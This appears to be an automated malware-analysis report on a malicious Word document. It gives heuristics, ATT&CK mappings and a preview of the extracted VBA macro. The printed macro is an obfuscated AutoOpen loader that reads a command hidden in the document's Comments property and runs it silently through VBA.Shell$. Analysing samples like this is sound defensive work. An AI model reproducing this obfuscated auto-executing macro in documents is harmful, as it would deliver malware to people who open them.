MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro triggers the execution of obfuscated VBA code. This code utilizes the Shell() function, a critical indicator of potential payload execution. The presence of the Shell() call and the autoexec marker strongly suggests the macro's purpose is to download and execute a second-stage payload.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5687 bytes |
SHA-256: 12ac87cbf09fd6872e1ca6c3f2fa70b9a0b2517187b82d4b1d8d4794cfa7f499 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
WdrGvPa
End Sub
Function WdrGvPa()
TpzZzLanfmh = "XgmVMaPsdR" + "vYAsCuA" + "GYbKzVnKS" + "YwueTTsDD" + "PgwtbXCYt" + "vbruykUF" + dthsKEzXbs = "XsfTRLNszWU" + "KNXNwTg" + "pXwSBAkdV" + "MZxwZBUrL" + "rNnveFs" + "XdHfYSeXar" + VTTUdKkD = "xVEYvCfRRcX" + "XMrmtZBf" + "YBmUVLZbhR" + "nTuEpMF" + "eBrnHztdyCD" + "TCWTYbLT" + spFtyMWW = "FpNhHFnVRA" + "DbucYAWxzeA" + "XuTUmEYrYD" + "EuvByut" + "rztBEzcEE" + "RmgvYPBZNr" + "EbvhXLBgTW"
faNAfshMUpw = "agrMsWFPm" + "yXgEkgWK" + "pVReyhZAR" + "DBHeDrA" + "yWLeazzbFMz" + "NNALSxsA" + VeGcUdVm = "XNWrAXNY" + "GuMpFBBCkt" + "vhVubRWbDC" + "ycGUMKBsYA" + "hSPXygezk" + "BahCNmffWB" + pdDSdLeghNP = "pkHvGnLcM" + "uvFZECB" + "fwzdEGpxsnz" + "YXWFzmaSS" + "GVgcvWkmx" + "FpcUGfzz" + "GKTXsfmtB"
srvnBAW = "HyaZUPR" + "pvbmrznVu" + "UVXpZPhww" + "EKgUUpUmep" + "RxAFPdDA" + "XrnPLXf" + beXpUWwwtk = "YgNrNxshav" + "spCYLRhF" + "gpvgXPFGFBP" + "hAfUrUnB" + "wgcFCcEV" + "CbyZeatdB" + TmGTHCeSH = "XYdLLZku" + "wVZmpdtR" + "rEkBudXDn" + "RFGsEMLLtdX" + "xGmTDNRfcZG" + "kkgwKfdkB" + VfHaaGXB = "uhrGpgZfZTN" + "PyNyCFZ" + "CpnwYhe" + "brGVNUDeGH" + "vpkcKdVCx" + "BcxUvpsxwf" + "wexwhcntN"
UwSTLdcmd = "vDLRdWe" + "TLgGwMk" + "BTvnLRePPhX" + "hrAuWtmXvN" + "PwuuxtHh" + "DHuWCXKS" + tgNVCfUm = "cytLprhz" + "MRcKchRKTy" + "SYeXFKaT" + "StUrUxPS" + "GkNwzdf" + "HwsAaxAkwsK" + "NYkLhaGREaD"
kdVXcrDe = "CPruxRuCLeY" + "LWnDHExYh" + "VwRRxtTBZd" + "BmPzNWzP" + "uaYDpwF" + "ewzgAZf" + KTwxcWh = "yfvyZmvHz" + "VRXZTdaDM" + "MEVPaXmVxP" + "AahMEhsNK" + "pVKxuEf" + "ueuTAkA" + YYSBYte = "hrNyteR" + "fgRExsVh" + "tPTVCVuRZ" + "LbfpBBhydk" + "CGWaNPkK" + "kNrLaZtuw" + RPraXYXHK = "WkPwkadg" + "AcxxzZK" + "NySxyzz" + "XauCKuNU" + "wXsHVtPDp" + "KxPfXeTcw" + "WwHaLbG"
kDLyWdxy = "pO" + rTmAcpYZgKM + SZvWDrkHP + NDzRxLtmV + kbtpcrUTbzF + fbtpmLsXntK + MBPaypPGm + LmKSKnssew + DgvBCZNWWk + EvwgfKMaZ + GyDMbhM + ActiveDocument.BuiltInDocumentProperties("Co" + "mm" + "ents") + rTmAcpYZgKM + SZvWDrkHP + NDzRxLtmV + kbtpcrUTbzF + fbtpmLsXntK + MBPaypPGm + LmKSKnssew + DgvBCZNWWk + EvwgfKMaZ + GyDMbhM + HhceduC
YpSKWUDT = "CNZmCegm" + "FCZmazhyE" + "ncAUTCCrt" + "VYxRDNRGG" + "xdEmEAKcNe" + "pUzXgMmRmD" + wkwwaUMc = "pWKfFuM" + "TxXFBmp" + "XCKAWSvX" + "CctdCsEatL" + "gAXnYewvx" + "nWnmhUPk" + zEcenUy = "BNvzEEBr" + "bWpbvHxTs" + "NnfyZNnwd" + "FcsYeCRxY" + "BZAVTrZYGhB" + "hxZEktT" + "dmnbUsDnKn"
ysHmEYEeK = "FDUNUKVM" + "TLxtmvwr" + "mBZAfseFhm" + "mwpVrbsmpBY" + "RVCeEEAMmu" + "LEFvDakM" + CvBkXGeX = "HPMPMeM" + "nSrgfUdWkA" + "kZtEbBdZEKB" + "aUxkMkST" + "hnNvpka" + "yFhCEHz" + "whsmxGP"
nsctMab = "XHwBXsAgbY" + "ECNKZSPA" + "ghTbeKNsFw" + "Dyafxbptn" + "cwscHpNuC" + "FUgpbzGayZ" + NSYVuwWnwz = "LVHbTBFvMEK" + "szVRUprf" + "rEdHPDvzDf" + "AKmdwkMDFME" + "SGHVTxR" + "ecyeZBpReyZ" + McHxzAFtKK = "LSSBmYvp" + "KaxdHRVSz" + "trVFyYPF" + "fNbYrrDLR" + "CneynFWznM" + "VhKbXzxn" + hebEPpLKVwW = "brbbvVX" + "GNxKYdrAmFX" + "NyAvECG" + "ymLeedzW" + "cFrWHHFf" + "NzzwHgYPgMm" + ALaGBYTLK = "ZwgpLyNhHHT" + "neLbydXBESC" + "dRXwmpbD" + "dWxWMvTr" + "CnBuVhMTS" + "SwCUCEaBwmp" + "bbgdCwfsYy"
dGrsaZEmSz = "csZhswYBnF" + "UwzZKWabME" + "pDXymXuuX" + "mFUcdLKZwCx" + "KUBUvsfNxC" + "ZwytFHTT" + YhBkknf = "pYBvDXm" + "FeNuYpAxcHp" + "zWsnGsKE" + "ugkCRfYHt" + "vucUYPDXw" + "KRLYuKu" + CphAwFdhATG = "ySRzyXBPRRy" + "BpHbGVyt" + "NwYFyLHXVHx" + "ZLgdSPeRUx" + "EXEkypaRE" + "GukkuERTRRa" + YvWLLXBc = "tmAyFBZy" + "FdgKUZHfSBW" + "NTLARWRCSkL" + "cbWyNNpnsn" + "wPVufgEyWfu" + "sVYmUDaTce" + "NUkfnUpctyv"
VBA.Shell$ "" + rTmAcpYZgKM + SZvWDrkHP + NDzRxLtmV + kbtpcrUTbzF + fbtpmLsXntK + MBPaypPGm + LmKSKnssew + DgvBCZNWWk + EvwgfKMaZ + GyDMbhM + kDLyWdxy + rTmAcpYZgKM + SZvWDrkHP + NDzRxLtmV + kbtpcrUTbzF + fbtpmLsXntK + MBPaypPGm + LmKSKnssew + DgvBCZNWWk + EvwgfKMaZ + GyDMbhM + BsHrCKkeZ, 0
BzcKLsF
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.